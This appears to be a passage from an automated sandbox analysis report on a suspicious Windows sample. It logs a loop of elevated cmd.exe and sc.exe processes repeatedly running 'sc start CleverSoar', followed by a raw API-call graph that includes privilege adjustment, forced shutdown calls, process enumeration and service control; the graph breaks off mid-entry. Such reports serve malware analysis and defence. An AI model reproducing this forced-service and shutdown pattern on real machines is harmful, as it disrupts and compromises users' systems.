                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:76
                                          Start time:03:15:46
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:77
                                          Start time:03:15:46
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:78
                                          Start time:03:15:46
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:79
                                          Start time:03:15:46
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:80
                                          Start time:03:15:46
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:81
                                          Start time:03:15:46
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:82
                                          Start time:03:15:46
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:83
                                          Start time:03:15:46
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:84
                                          Start time:03:15:46
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:85
                                          Start time:03:15:46
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:86
                                          Start time:03:15:46
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:87
                                          Start time:03:15:47
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:88
                                          Start time:03:15:47
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:89
                                          Start time:03:15:47
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:90
                                          Start time:03:15:47
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:91
                                          Start time:03:15:47
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:92
                                          Start time:03:15:47
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:93
                                          Start time:03:15:47
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:94
                                          Start time:03:15:47
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:95
                                          Start time:03:15:47
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:96
                                          Start time:03:15:47
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:97
                                          Start time:03:15:47
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:98
                                          Start time:03:15:47
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:99
                                          Start time:03:15:47
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:100
                                          Start time:03:15:47
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:101
                                          Start time:03:15:47
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:102
                                          Start time:03:15:47
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:103
                                          Start time:03:15:47
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:104
                                          Start time:03:15:47
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:105
                                          Start time:03:15:48
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:106
                                          Start time:03:15:48
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:107
                                          Start time:03:15:48
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:108
                                          Start time:03:15:48
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true


                                            Execution Graph

                                            Execution Coverage:1.6%
                                            Dynamic/Decrypted Code Coverage:0%
                                            Signature Coverage:15.2%
                                            Total number of Nodes:834
                                            Total number of Limit Nodes:9
                                            execution_graph (interactive graph data; node-ID list omitted). API calls named on the graph's nodes include: CreateFileA, CreateFileW, GetCurrentProcess, TerminateProcess, GetCurrentThread, NtSetInformationThread, IsProcessorFeaturePresent, RaiseException, FindFirstFileA, FindClose, GetFileType, CloseHandle, SetStdHandle, WriteFile, GetConsoleMode, MultiByteToWideChar, HeapAlloc, HeapFree, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, OpenSCManagerA, CreateToolhelp32Snapshot.
6c785240 4 API calls 100842->100852 100845 6c786a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100848 6c605478 std::ios_base::_Ios_base_dtor _Yarn _strlen 100845->100848 100846->100835 100854 6c785240 4 API calls 100846->100854 100848->100830 100848->100840 100848->100845 100850 6c77aec0 2 API calls 100848->100850 100856 6c626ba0 104 API calls 100848->100856 100857 6c626e60 32 API calls 100848->100857 100859 6c627090 77 API calls 100848->100859 100863 6c64e010 67 API calls 100848->100863 100872 6c606162 100848->100872 100873 6c606722 100848->100873 100849 6c6137d0 Sleep 100890 6c6137e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 100849->100890 100850->100848 100851 6c6263b2 101029 6c6015e0 18 API calls std::ios_base::_Ios_base_dtor 100851->101029 100867 6c61053a 100852->100867 100876 6c6112e2 100854->100876 100855 6c6264f8 100856->100848 100857->100848 100859->100848 100860 6c785240 4 API calls 100860->100846 100861 6c785240 4 API calls 100879 6c611dd9 100861->100879 100862 6c61211c 100862->100835 100864 6c61241a 100862->100864 100863->100848 100866 6c770390 11 API calls 100864->100866 100865 6c77aec0 2 API calls 100865->100890 100868 6c61244d 100866->100868 100867->100846 100867->100860 101027 6c785d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 100868->101027 100870 6c612452 Sleep 100870->100835 100871 6c6116ac 100997 6c781880 25 API calls 4 library calls 100873->100997 100875 6c60740b 100998 6c784ff0 CreateProcessA 100875->100998 100876->100861 100876->100862 100876->100871 100877 6c785240 4 API calls 100877->100862 100878 6c626ba0 104 API calls 100878->100890 100879->100862 100879->100877 100880 6c626e60 32 API calls 100880->100890 100881 6c627090 77 API calls 100881->100890 100882 6c64e010 67 API calls 100882->100890 100883 6c60775a _strlen 100883->100830 100884 6c607b92 100883->100884 100885 6c607ba9 100883->100885 100888 6c607b43 _Yarn 
100883->100888 100886 6c786a43 std::_Facet_Register 4 API calls 100884->100886 100887 6c786a43 std::_Facet_Register 4 API calls 100885->100887 100886->100888 100887->100888 100889 6c77aec0 2 API calls 100888->100889 100899 6c607be7 std::ios_base::_Ios_base_dtor 100889->100899 100890->100830 100890->100865 100890->100878 100890->100880 100890->100881 100890->100882 100891 6c784ff0 4 API calls 100902 6c608a07 100891->100902 100892 6c609d68 100894 6c786a43 std::_Facet_Register 4 API calls 100892->100894 100893 6c609d7f 100895 6c786a43 std::_Facet_Register 4 API calls 100893->100895 100897 6c609d18 _Yarn 100894->100897 100895->100897 100896 6c60962c _strlen 100896->100830 100896->100892 100896->100893 100896->100897 100898 6c77aec0 2 API calls 100897->100898 100906 6c609dbd std::ios_base::_Ios_base_dtor 100898->100906 100899->100830 100899->100891 100899->100896 100900 6c608387 100899->100900 100901 6c784ff0 4 API calls 100910 6c609120 100901->100910 100902->100901 100903 6c784ff0 4 API calls 100920 6c60a215 _strlen 100903->100920 100904 6c784ff0 4 API calls 100905 6c609624 100904->100905 101002 6c785d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 100905->101002 100906->100830 100906->100903 100911 6c60e8b5 std::ios_base::_Ios_base_dtor _Yarn _strlen 100906->100911 100907 6c786a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100907->100911 100909 6c77aec0 2 API calls 100909->100911 100910->100904 100911->100830 100911->100907 100911->100909 100912 6c60f7b1 100911->100912 100913 6c60ed02 Sleep 100911->100913 101020 6c785d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 100912->101020 100932 6c60e8c1 100913->100932 100915 6c60e8dd GetCurrentProcess TerminateProcess 100915->100911 100916 6c60a9a4 100918 6c786a43 std::_Facet_Register 4 API calls 100916->100918 100917 6c60a9bb 100919 6c786a43 
std::_Facet_Register 4 API calls 100917->100919 100929 6c60a953 _Yarn _strlen 100918->100929 100919->100929 100920->100830 100920->100916 100920->100917 100920->100929 100921 6c784ff0 4 API calls 100921->100932 100922 6c60fbb8 100924 6c60fbe8 ExitWindowsEx Sleep 100922->100924 100923 6c60f7c0 100923->100922 100924->100840 100925 6c60aff0 100927 6c786a43 std::_Facet_Register 4 API calls 100925->100927 100926 6c60b009 100928 6c786a43 std::_Facet_Register 4 API calls 100926->100928 100930 6c60afa0 _Yarn 100927->100930 100928->100930 100929->100851 100929->100925 100929->100926 100929->100930 101003 6c785960 100930->101003 100932->100911 100932->100915 100932->100921 100933 6c60b059 std::ios_base::_Ios_base_dtor _strlen 100933->100830 100934 6c60b443 100933->100934 100935 6c60b42c 100933->100935 100938 6c60b3da _Yarn _strlen 100933->100938 100937 6c786a43 std::_Facet_Register 4 API calls 100934->100937 100936 6c786a43 std::_Facet_Register 4 API calls 100935->100936 100936->100938 100937->100938 100938->100851 100939 6c60b7b7 100938->100939 100940 6c60b79e 100938->100940 100943 6c60b751 _Yarn 100938->100943 100942 6c786a43 std::_Facet_Register 4 API calls 100939->100942 100941 6c786a43 std::_Facet_Register 4 API calls 100940->100941 100941->100943 100942->100943 100944 6c785960 104 API calls 100943->100944 100945 6c60b804 std::ios_base::_Ios_base_dtor _strlen 100944->100945 100945->100830 100946 6c60bc26 100945->100946 100947 6c60bc0f 100945->100947 100950 6c60bbbd _Yarn _strlen 100945->100950 100949 6c786a43 std::_Facet_Register 4 API calls 100946->100949 100948 6c786a43 std::_Facet_Register 4 API calls 100947->100948 100948->100950 100949->100950 100950->100851 100951 6c60c075 100950->100951 100952 6c60c08e 100950->100952 100955 6c60c028 _Yarn 100950->100955 100953 6c786a43 std::_Facet_Register 4 API calls 100951->100953 100954 6c786a43 std::_Facet_Register 4 API calls 100952->100954 100953->100955 100954->100955 100956 6c785960 104 API calls 100955->100956 100961 
6c60c0db std::ios_base::_Ios_base_dtor _strlen 100956->100961 100957 6c60c7a5 100959 6c786a43 std::_Facet_Register 4 API calls 100957->100959 100958 6c60c7bc 100960 6c786a43 std::_Facet_Register 4 API calls 100958->100960 100968 6c60c753 _Yarn _strlen 100959->100968 100960->100968 100961->100830 100961->100957 100961->100958 100961->100968 100962 6c60d406 100965 6c786a43 std::_Facet_Register 4 API calls 100962->100965 100963 6c60d3ed 100964 6c786a43 std::_Facet_Register 4 API calls 100963->100964 100966 6c60d39a _Yarn 100964->100966 100965->100966 100967 6c785960 104 API calls 100966->100967 100969 6c60d458 std::ios_base::_Ios_base_dtor _strlen 100967->100969 100968->100851 100968->100962 100968->100963 100968->100966 100974 6c60cb2f 100968->100974 100969->100830 100970 6c60d8a4 100969->100970 100971 6c60d8bb 100969->100971 100975 6c60d852 _Yarn _strlen 100969->100975 100972 6c786a43 std::_Facet_Register 4 API calls 100970->100972 100973 6c786a43 std::_Facet_Register 4 API calls 100971->100973 100972->100975 100973->100975 100975->100851 100976 6c60dcb6 100975->100976 100977 6c60dccf 100975->100977 100980 6c60dc69 _Yarn 100975->100980 100978 6c786a43 std::_Facet_Register 4 API calls 100976->100978 100979 6c786a43 std::_Facet_Register 4 API calls 100977->100979 100978->100980 100979->100980 100981 6c785960 104 API calls 100980->100981 100983 6c60dd1c std::ios_base::_Ios_base_dtor 100981->100983 100982 6c784ff0 4 API calls 100982->100911 100983->100830 100983->100982 100986 6c785156 100984->100986 100985 6c7851e8 OpenServiceA 100985->100986 100986->100985 100987 6c78522f 100986->100987 100987->100848 100993 6c7703a3 _Yarn __wsopen_s std::locale::_Setgloballocale _strlen 100988->100993 100989 6c77310e CloseHandle 100989->100993 100990 6c773f5f CloseHandle 100990->100993 100991 6c77251b CloseHandle 100991->100993 100992 6c6137cb 100996 6c785d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 100992->100996 
100993->100989 100993->100990 100993->100991 100993->100992 100994 6c75c1e0 WriteFile WriteFile WriteFile ReadFile 100993->100994 101030 6c75b730 100993->101030 100994->100993 100996->100849 100997->100875 100999 6c7850ca 100998->100999 101000 6c785080 WaitForSingleObject CloseHandle CloseHandle 100999->101000 101001 6c7850e3 100999->101001 101000->100999 101001->100883 101002->100896 101004 6c7859b7 101003->101004 101041 6c785ff0 101004->101041 101006 6c7859c8 101007 6c626ba0 104 API calls 101006->101007 101012 6c7859ec 101007->101012 101008 6c64e010 67 API calls 101009 6c785a9f std::ios_base::_Ios_base_dtor 101008->101009 101011 6c64e010 67 API calls 101009->101011 101018 6c785ae2 std::ios_base::_Ios_base_dtor 101011->101018 101013 6c785a54 101012->101013 101019 6c785a67 101012->101019 101060 6c786340 101012->101060 101068 6c662000 101012->101068 101078 6c785b90 101013->101078 101016 6c785a5c 101017 6c627090 77 API calls 101016->101017 101017->101019 101018->100933 101019->101008 101020->100923 101022 6c7852a0 std::locale::_Setgloballocale 101021->101022 101023 6c785277 CloseHandle 101022->101023 101024 6c785320 Process32NextW 101022->101024 101025 6c7853b1 101022->101025 101026 6c785345 Process32FirstW 101022->101026 101023->101022 101024->101022 101025->100842 101026->101022 101027->100870 101029->100855 101031 6c75b743 _Yarn __wsopen_s std::locale::_Setgloballocale 101030->101031 101032 6c75c180 101031->101032 101033 6c75bced CreateFileA 101031->101033 101035 6c75aa30 101031->101035 101032->100993 101033->101031 101038 6c75aa43 __wsopen_s std::locale::_Setgloballocale 101035->101038 101036 6c75b3e9 WriteFile 101036->101038 101037 6c75b43d WriteFile 101037->101038 101038->101036 101038->101037 101039 6c75b718 101038->101039 101040 6c75ab95 ReadFile 101038->101040 101039->101031 101040->101038 101042 6c786025 101041->101042 101043 6c652020 52 API calls 101042->101043 101044 6c7860c6 101043->101044 101045 6c786a43 std::_Facet_Register 4 API calls 101044->101045 
101046 6c7860fe 101045->101046 101047 6c787327 43 API calls 101046->101047 101048 6c786112 101047->101048 101049 6c651d90 89 API calls 101048->101049 101050 6c7861bb 101049->101050 101051 6c7861ec 101050->101051 101093 6c652250 30 API calls 101050->101093 101051->101006 101053 6c786226 101094 6c6526e0 24 API calls 4 library calls 101053->101094 101055 6c786238 101095 6c789379 RaiseException 101055->101095 101057 6c78624d 101058 6c64e010 67 API calls 101057->101058 101059 6c78625f 101058->101059 101059->101006 101061 6c78638d 101060->101061 101096 6c7865a0 101061->101096 101063 6c78647c 101063->101012 101066 6c7863a5 101066->101063 101114 6c652250 30 API calls 101066->101114 101115 6c6526e0 24 API calls 4 library calls 101066->101115 101116 6c789379 RaiseException 101066->101116 101069 6c66203f 101068->101069 101072 6c662053 101069->101072 101125 6c653560 32 API calls std::_Xinvalid_argument 101069->101125 101074 6c66210e 101072->101074 101127 6c652250 30 API calls 101072->101127 101128 6c6526e0 24 API calls 4 library calls 101072->101128 101129 6c789379 RaiseException 101072->101129 101073 6c662121 101073->101012 101074->101073 101126 6c6537e0 32 API calls std::_Xinvalid_argument 101074->101126 101079 6c785b9e 101078->101079 101083 6c785bd1 101078->101083 101080 6c6501f0 64 API calls 101079->101080 101082 6c785bc4 101080->101082 101081 6c785c83 101081->101016 101084 6c790b18 67 API calls 101082->101084 101083->101081 101130 6c652250 30 API calls 101083->101130 101084->101083 101086 6c785cae 101131 6c652340 24 API calls 101086->101131 101088 6c785cbe 101132 6c789379 RaiseException 101088->101132 101090 6c785cc9 101091 6c64e010 67 API calls 101090->101091 101092 6c785d22 std::ios_base::_Ios_base_dtor 101091->101092 101092->101016 101093->101053 101094->101055 101095->101057 101097 6c786608 101096->101097 101098 6c7865dc 101096->101098 101105 6c786619 101097->101105 101117 6c653560 32 API calls std::_Xinvalid_argument 101097->101117 101099 6c786601 101098->101099 
101119 6c652250 30 API calls 101098->101119 101099->101066 101102 6c7867e8 101120 6c652340 24 API calls 101102->101120 101104 6c7867f7 101121 6c789379 RaiseException 101104->101121 101105->101099 101118 6c652f60 42 API calls 4 library calls 101105->101118 101109 6c786827 101123 6c652340 24 API calls 101109->101123 101111 6c78683d 101124 6c789379 RaiseException 101111->101124 101113 6c786653 101113->101099 101122 6c652250 30 API calls 101113->101122 101114->101066 101115->101066 101116->101066 101117->101105 101118->101113 101119->101102 101120->101104 101121->101113 101122->101109 101123->101111 101124->101099 101125->101072 101126->101073 101127->101072 101128->101072 101129->101072 101130->101086 101131->101088 101132->101090 101133 6c614a27 101134 6c614a5d _strlen 101133->101134 101135 6c62639e 101134->101135 101136 6c615b58 101134->101136 101137 6c615b6f 101134->101137 101141 6c615b09 _Yarn 101134->101141 101224 6c790130 18 API calls __Getctype 101135->101224 101138 6c786a43 std::_Facet_Register 4 API calls 101136->101138 101139 6c786a43 std::_Facet_Register 4 API calls 101137->101139 101138->101141 101139->101141 101142 6c77aec0 2 API calls 101141->101142 101144 6c615bad std::ios_base::_Ios_base_dtor 101142->101144 101143 6c784ff0 4 API calls 101149 6c6161cb _strlen 101143->101149 101144->101135 101144->101143 101147 6c619ba5 std::ios_base::_Ios_base_dtor _Yarn _strlen 101144->101147 101145 6c786a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 101145->101147 101146 6c77aec0 2 API calls 101146->101147 101147->101135 101147->101145 101147->101146 101148 6c61a292 Sleep 101147->101148 101166 6c61e619 101147->101166 101188 6c619bb1 std::ios_base::_Ios_base_dtor _Yarn _strlen 101148->101188 101149->101135 101150 6c616624 101149->101150 101151 6c61660d 101149->101151 101157 6c6165bc _Yarn _strlen 101149->101157 101153 6c786a43 std::_Facet_Register 4 API calls 101150->101153 101152 6c786a43 
